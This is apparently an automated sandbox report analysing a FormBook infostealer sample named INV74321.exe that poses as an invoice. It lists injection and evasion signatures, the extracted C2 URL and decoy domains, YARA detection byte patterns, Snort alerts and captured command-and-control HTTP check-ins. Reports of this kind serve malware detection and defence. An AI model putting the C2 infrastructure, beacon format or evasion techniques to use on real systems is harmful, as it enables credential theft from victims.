Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report INV74321.exe

Overview

General Information

Sample Name:INV74321.exe
Analysis ID:411840
MD5:877bb5661fe79bb7f48cfb3ea54537a0
SHA1:dd6b5263da3b4f1a42e89c2c1ade852098561c5d
SHA256:87935ff36515ecb6a4177c25ad1d11e8d2882aa1c3f369e719406f063a062517
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • INV74321.exe (PID: 5520 cmdline: 'C:\Users\user\Desktop\INV74321.exe' MD5: 877BB5661FE79BB7F48CFB3EA54537A0)
    • INV74321.exe (PID: 4604 cmdline: 'C:\Users\user\Desktop\INV74321.exe' MD5: 877BB5661FE79BB7F48CFB3EA54537A0)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6292 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6480 cmdline: /c del 'C:\Users\user\Desktop\INV74321.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.INV74321.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.INV74321.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.INV74321.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        0.2.INV74321.exe.29a0000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.INV74321.exe.29a0000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.nobleandmarble.com/or4i/"], "decoy": ["cylindberg.com", "qsmpy.world", "hairmaxxclinic.com", "teesfitpro.com", "changethecompany.net", "painteredmond.com", "shebagholdings.com", "wasteexport.com", "salesclerkadage.life", "rainboxs.com", "lingoblasterdiscount.com", "booweats.com", "topcasino-111.com", "downtoearthwork.com", "carry-hai.com", "nassaustreetcorp.com", "directflence.com", "basictrainningphothos.com", "virtualayurveda.com", "dar-sanidad.com", "businessenglish.company", "safegrinder.com", "blissfulyogamullicahill.com", "smartmatch-dating-api.com", "heaset.com", "fingerpointingimp.com", "rogersbeefarm.com", "guysgunsandcountry.com", "attackbit.com", "bawalturki.com", "goodmanifest.com", "healshameyoga.com", "citiphoneonline.com", "canaltransportllc.com", "theflagdude.com", "mmgenius.com", "ikeberto.com", "sky-cargo.net", "tecquestrian.com", "ashleylovica.com", "contorig2.com", "nowhealthdays.com", "dadaoliangpi.com", "three.guide", "anoussa.com", "fanyingfu001.com", "matthewdimartino.com", "ventadearticulosreligiosos.com", "collegesupermatch.com", "king-jackpot.com", "puppillows.store", "woodforsmoke.com", "globaltradesclub.com", "flipkart-max-sale.xyz", "carlyle-cocao.com", "cuntrera.com", "sadafalbahariq.com", "spmomgoals.com", "mk-365.com", "yanghuoquan.com", "xn--espacesacr-k7a.com", "pidelodirecto.com", "0o-a-8v4l76.net", "aqayeseo.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dllMetadefender: Detection: 26%Perma Link
          Source: C:\Users\user\AppData\Local\Temp\nsi6113.tmp\q7pl.dllReversingLabs: Detection: 55%
          Multi AV Scanner detection for submitted fileShow sources
          Source: INV74321.exeVirustotal: Detection: 30%Perma Link
          Source: INV74321.exeMetadefender: Detection: 14%Perma Link
          Source: INV74321.exeReversingLabs: Detection: 72%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.223286831.00000000029A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473119363.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257388268.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.472051728.00000000030B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.257352957.00000000009A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.473219825.0000000003600000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV74321.exe.29a0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.INV74321.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.1.INV74321.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.INV74321.exe.29a0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.INV74321.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: INV74321.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: INV74321.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: MusNotifyIcon.pdb source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: INV74321.exe, 00000000.00000003.214730841.0000000002B90000.00000004.00000001.sdmp, INV74321.exe, 00000001.00000002.257577232.0000000000BCF000.00000040.00000001.sdmp, wlanext.exe, 00000008.00000002.474058438.000000000383F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: INV74321.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: Binary string: MusNotifyIcon.pdbGCTL source: explorer.exe, 00000005.00000000.244743152.000000000F686000.00000004.00000001.sdmp
          Source: Binary string: wlanext.pdbGCTL source: INV74321.exe, 00000001.00000002.257445495.0000000000A50000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 0_2_004027A1 FindFirstFileA,
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\Desktop\INV74321.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49727 -> 119.18.54.126:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49733 -> 163.43.122.109:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49734 -> 104.21.46.55:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49738 -> 64.190.62.111:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49741 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.nobleandmarble.com/or4i/
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1Host: www.king-jackpot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1Host: www.0o-a-8v4l76.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1Host: www.downtoearthwork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1Host: www.topcasino-111.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1Host: www.shebagholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1Host: www.booweats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1Host: www.xn--espacesacr-k7a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 64.190.62.111 64.190.62.111
          Source: Joe Sandbox ViewASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK
          Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
          Source: Joe Sandbox ViewASN Name: NBS11696US NBS11696US
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=xDS7CyCJ4m7HrOhyeYRIonE7yEohNWwwbSjxvOh7bSQREc8K1tWvWT2hFG1Cb6Pxbdkw&KdTL=a2JxONfH HTTP/1.1Host: www.king-jackpot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=/YqV2YobZFGxQDMEPRH3FzX3sp56PIzy9ik5N6g8OdLGQC9Q4dIJ/Xm93vftNToRdJfn HTTP/1.1Host: www.0o-a-8v4l76.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=vk1T1/Otk3yMmnVlXkpxnnLL8r3GDGLc1I2gV0bP1VjWwuz1bkf/wMDaHcJA224PqQY0&KdTL=a2JxONfH HTTP/1.1Host: www.downtoearthwork.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=3f8HQQz9URnG4Uu+PIIk9qulCbedODjEyUaPCq0CAbkTamHv8kfsRb46QNyKsrnaM2YM&KdTL=a2JxONfH HTTP/1.1Host: www.topcasino-111.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=JH4nS7VeW/UW/jbaFlzhauiIX/+RMeGdEmcv+8JYSHoft+e37yOEU8VwtY3nHc6WUP+N HTTP/1.1Host: www.shebagholdings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?iN6=qot6XnlSyPOFXuVGORD9CEtZEU4GG3KqT75/dB/Qk/mHCfMLKHKtxcGvS1QijbP8ODf8&KdTL=a2JxONfH HTTP/1.1Host: www.booweats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /or4i/?KdTL=a2JxONfH&iN6=aXFVbdpXZKuOxG6QcVTci15xYCj/Qxdw9P9YBGKWWpBj56F6fv1TkawGdiCQA9RepvWh HTTP/1.1Host: www.xn--espacesacr-k7a.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.aqayeseo.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 12 May 2021 05:36:25 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Wed, 24 Feb 2021 17:47:31 GMTAccept-Ranges: bytesContent-Length: 583Vary: Accept-EncodingContent-Type: text/htmlData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 5f 73 6b 7a 5f 70 69 64 20 3d 20 22 39 50 4f 42 45 58 38 30 57 22 3b 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 63 64 6e 2e 6a 73 69 6e 69 74 2e 64 69 72 65 63 74 66 77 64 2e 63 6f 6d 2f 73 6b 2d 6a 73 70 61 72 6b 5f 69 6e 69 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 61 64 65 72 22 20 69 64 3d 22 73 6b 2d 6c 6f 61 64 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
          Source: explorer.exe, 00000005.00000000.244675991.000000000F640000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: INV74321.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: INV74321.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.243006407.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
